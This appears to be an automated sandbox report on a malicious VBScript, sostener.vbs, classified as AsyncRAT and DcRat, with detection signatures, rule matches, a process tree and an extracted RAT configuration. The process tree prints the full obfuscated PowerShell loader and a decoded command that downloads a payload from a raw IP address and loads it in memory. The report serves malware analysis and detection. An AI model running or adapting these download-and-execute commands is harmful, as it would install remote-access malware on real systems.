Windows Analysis Report
sostener.vbs
Overview
General Information
Detection
AsyncRAT, DcRat
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected DcRat
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 5332 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 3848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = ' J Bx Gs dg B3 HI I 9 C Jw w Cc Ow k Gk YQ Bx HU Yw g D0 I n CU c B6 EE Y wBP Gc SQB u E0 cg l Cc OwBb EI eQB0 GU W wBd F0 I k Hk dwBq G Q a g D0 I Bb HM eQB z HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgB G HI bwBt EI YQBz GU Ng 0 FM d By Gk bgB n Cg I o E 4 ZQB3 C0 TwBi Go ZQ Bj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB 0 Ck LgBE G8 dwBu Gw bwBh GQ U wB0 HI aQB u Gc K n G g d B0 H O g v C8 OQ x C4 Mg w DI Lg y DM Mw u DE N g 5 C8 V B h Gs LwBS GU Zw v E0 YQBy Ho L wBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 Q QBw H R Bv G0 YQBp G 4 XQ 6 Do QwB1 HI cg Bl G4 d BE G8 bQBh G k bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew a QBi HI YQB y Hk MQ u EM b Bh HM cw x Cc K Q u Ec ZQB 0 E0 ZQB0 Gg bwBk Cg JwBa Hg S wBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQ Bs Gw L g Fs bwBi Go ZQBj HQ W wBd F0 I o Cc d B4 H Q Lg x Eo R v FM VgB O EU LwB6 HI YQBN C8 ZwBl FI L wBr GE V v Dk Ng x C 4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwB S Gc dgB1 Ec Jw s C J Bx Gs dg B3 HI L g Cc MQ n Cw I n FI bw Bk GE Jw g Ck KQ 7 = =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ', 'A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL; MD5: 04029E121A0CFA5991749937DD22A1D9)
    - conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    - powershell.exe (PID: 4312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt') );[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' )); " MD5: 04029E121A0CFA5991749937DD22A1D9)
      - RegSvcs.exe (PID: 6884 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open-source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques. | No Attribution | | |
DCRat | DCRat is a typical RAT that has been around since at least June 2019. | No Attribution | | |
{"Server": ")8\"zc", "Ports": "$A<IlE,84,7;&gV", "Version": "*wacp!]6l[e", "BDOS": "U^2", "AES_key": "R4OsSR16j3MjPEBlkfzyOGTLnlxVVuwW", "Mutex": "n#QO", "Certificate": "UDq5O^", "ServerSignature": "1", "Group": "Oy\\iql0S13XbS4sp1@PsWg:PGIw'~?Q;ifHa#3ef8L\"SpWzk,&&}s;$/?J9UH3>j3={V'nCn.PI*|e>4&k2[2Y\"w$T+^X_j9HSG[?b*'54eS5e_~(e#Z\"n,TX*T->_qfnrv]TM^:Sm1uBPI9|\\4a^^?R|av{V =9J2E|^{wS7Zq,=)a;uL uRaE\"K5bW ycl@NpcoGBww~DzGBkD+U1vws!$\"Awn}G}9cJ6;M^g4xsh'`s^(KX%.#m`^wc.Syd?~c\"Lsj>]?`qx7a!]~a7*CV\\/w6F+j0{&]M*&[7-]2Y</uTKz[gT&GM", "AntiProcess": "HB!<i[>IoEHueVuN1#fc!@?Z#TsdM.i5RX/xjjmOH +NC,v <85~NN!Z.)uebFY`", "PasteBin": "FLVl;"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| Windows_Trojan_DCRat_1aeea1ac | unknown | unknown | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | |
| MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen | |
| JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | |
| Windows_Trojan_DCRat_1aeea1ac | unknown | unknown | |
| Windows_Trojan_DCRat_1aeea1ac | unknown | unknown | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | |
| MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen | |
| JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | |
| Windows_Trojan_DCRat_1aeea1ac | unknown | unknown | |
| INDICATOR_SUSPICIOUS_EXE_B64_Artifacts | Detects executables embedding base64-encoded APIs, command lines, registry keys, etc. | ditekSHen | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems) |